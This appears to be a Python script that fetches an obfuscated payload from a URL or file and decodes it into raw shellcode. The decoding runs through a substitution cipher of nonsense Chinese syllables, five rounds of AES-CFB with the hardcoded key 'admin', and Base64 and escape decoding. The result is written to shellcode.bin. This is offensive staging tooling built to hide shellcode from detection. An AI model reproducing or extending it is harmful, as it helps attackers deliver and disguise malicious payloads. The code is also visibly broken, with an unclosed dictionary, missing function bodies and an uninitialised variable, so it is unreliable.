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Created January 10, 2024 22:15
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import argparse
import base64
import codecs
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from os import urandom
import urllib.request
import hashlib
import re
encoding_rules = {
'a': '玛卡巴卡轰',
'b': '阿巴雅卡轰',
'c': '伊卡阿卡噢轰',
'd': '哈姆达姆阿卡嗙轰',
'e': '咿呀呦轰',
'f': '玛卡雅卡轰',
'g': '伊卡阿卡轰',
'h': '咿呀巴卡轰',
'i': '达姆阿卡嗙轰',
'j': '玛卡巴卡玛卡巴卡轰',
'k': '玛卡巴卡玛卡巴卡玛卡巴卡轰',
'l': '玛卡巴卡玛卡巴卡玛卡巴卡玛卡巴卡轰',
'm': '阿巴雅卡阿巴雅卡轰',
'n': '阿巴雅卡阿巴雅卡阿巴雅卡轰',
'o': '阿巴雅卡阿巴雅卡阿巴雅卡阿巴雅卡轰',
'p': '伊卡阿卡噢伊卡阿卡噢轰',
'q': '伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰',
'r': '伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰',
's': '哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰',
't': '哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰',
'u': '哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰',
'v': '咿呀呦咿呀呦轰',
'w': '咿呀呦咿呀呦咿呀呦轰',
'x': '咿呀呦咿呀呦咿呀呦咿呀呦轰',
'y': '咿呀呦咿呀呦咿呀呦咿呀呦咿呀呦轰',
'z': '玛卡雅卡玛卡雅卡轰',
'A': '玛卡雅卡玛卡雅卡玛卡雅卡轰',
'B': '玛卡雅卡玛卡雅卡玛卡雅卡玛卡雅卡轰',
'C': '伊卡阿卡伊卡阿卡轰',
'D': '伊卡阿卡伊卡阿卡伊卡阿卡轰',
'E': '伊卡阿卡伊卡阿卡伊卡阿卡伊卡阿卡轰',
'F': '咿呀巴卡咿呀巴卡轰',
'G': '咿呀巴卡咿呀巴卡咿呀巴卡轰',
'H': '咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰',
'I': '咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰',
'J': '达姆阿卡嗙达姆阿卡嗙轰',
'K': '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰',
'L': '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰',
'M': '达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰',
'N': '巴卡巴卡轰',
'O': '巴卡巴卡巴卡巴卡轰',
'P': '巴卡巴卡巴卡巴卡巴卡巴卡轰',
'Q': '巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰',
'R': '巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰',
'S': '呀呦轰',
'T': '呀呦呀呦轰',
'U': '呀呦呀呦呀呦轰',
'V': '呀呦呀呦呀呦呀呦轰',
'W': '呀呦呀呦呀呦呀呦呀呦轰',
'X': '达姆阿卡轰',
'Y': '达姆阿卡达姆阿卡轰',
'Z': '达姆阿卡达姆阿卡达姆阿卡轰',
'0': '达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰',
'1': '达姆阿卡达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰',
'2': '玛巴轰',
'3': '玛巴玛巴轰',
'4': '玛巴玛巴玛巴轰',
'5': '玛巴玛巴玛巴玛巴轰',
'6': '巴卡玛巴轰',
'7': '巴卡玛巴巴卡玛巴轰',
'8': '巴卡玛巴巴卡玛巴巴卡玛巴轰',
'9': '巴卡玛巴巴卡玛巴巴卡玛巴巴卡玛巴轰',
'=': '妈个巴子轰',
'/': '妈个巴卡轰',
'+': '妈个巴达轰',
def decodemaba(miwen):
# print(f'密文{miwen}')
result = re.split(r'(?<=轰)', miwen)
# print(result)
for it in result:
for key,val in encoding_rules.items():
if it==val:
# print("找到明文密码")
# print(key)
mingwen = str(mingwen)+str(key)
return mingwen
def decrypt(encrypted_text, key):
key = hashlib.sha256(key.encode('utf-8')).digest()[:16]
encrypted_data = base64.b64decode(encrypted_text.encode('utf-8'))
iv = encrypted_data[:16]
cipher = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend())
decryptor = cipher.decryptor()
decrypted_text = decryptor.update(encrypted_data[16:]) + decryptor.finalize()
decrypted_text = decrypted_text.rstrip(b"\0")
return decrypted_text.decode('utf-8')
def process_shellcode(shellcode, key="admin", output_file_path="shellcode.bin"):
shellcode = shellcode.strip()
shellcode = shellcode.decode("gbk")
shellcode = decodemaba(shellcode)
for _ in range(5):
shellcode = decrypt(encrypted_text=shellcode, key=key)
shellcode = shellcode.replace("dashabi", '')
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
write_to_file(shellcode, output_file_path)
def fetch_shellcode_from_url(url):
response = urllib.request.urlopen(url)
def read_shellcode_from_file(file_path):
with open(file_path, 'rb') as file:
def write_to_file(data, file_path):
with open(file_path, "wb") as file:
def main():
parser = argparse.ArgumentParser(description="Process shellcode from a URL or file")
parser.add_argument('-u', '--url', type=str, help="URL to fetch shellcode from")
parser.add_argument('-i', '--input', type=str, help="File path to read shellcode from")
parser.add_argument('-o', '--output', type=str, default="shellcode.bin", help="Output file path (default: shellcode.bin)")
args = parser.parse_args()
shellcode = ""
if args.url:
shellcode = fetch_shellcode_from_url(args.url)
elif args.input:
shellcode = read_shellcode_from_file(args.input)
print("Please provide a URL or an input file path.")
process_shellcode(shellcode, output_file_path=args.output)
if __name__ == "__main__":
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